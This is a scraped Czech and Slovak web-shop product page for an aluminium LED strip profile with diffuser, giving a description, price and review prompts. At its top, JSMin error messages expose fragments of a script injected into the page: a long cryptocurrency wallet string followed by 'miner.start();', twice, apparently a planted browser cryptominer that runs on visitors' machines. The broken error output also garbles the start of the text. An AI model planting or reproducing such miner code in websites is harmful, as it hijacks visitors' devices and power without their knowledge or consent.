JSMin: Unterminated String at byte 148: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();JSMin: Unterminated String at byte 160: '49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start();/* */LED profil Micro

Vítejte

LED profil Micro K

0 Recenze

Dostupnost: Skladem (2 položky)

Více informací Příslušenství Komentáře

 Cena za 1 metr komplet LED lišty s difuzorem bez koncovek. Možnosť výberu difúzora transparetný alebo mliečny a LED pásků podle vlastního výběru.

LED lišty jsou navrženy pro LED pásky a využívají se pro dekorativní a pracovní nasvícení různých částí nábytku, interiérových a exteriérových částí. ALU profily spolu s LED páskem umožňují docílit profesionální výsledek při realizaci osvětlení. Svítidla vyrobená z ALU lišt mohou vydávat dekorativní ale i plně funkční svetlo. Zapustené lišty jsou instalovány do zafrézované drážky v korpusu, takže je vidět jen lem ALU profilu. Lišty na povrch jsou instalovány na korpus nebo stěnu a to přilepením, nebo pomocí ocelových úchytů. ALU profily kromě elegantního designu mechanicky chrání LED pásek a dobře odvádějí teplo z LED pásku čímž prodlužují jeho životnost.

Napište svůj názor

LED profil Micro K

LED profil Micro K

 Komplet LED profil včetne difúzora.LED profil spolu s LED pásikom tvorí kompletné svietidlo. 

Napište svůj názor

CZK 240,79

plus1

» Přidat do mého seznamu přání

  • Remove this product from my favorites
  • Add this product to my favorites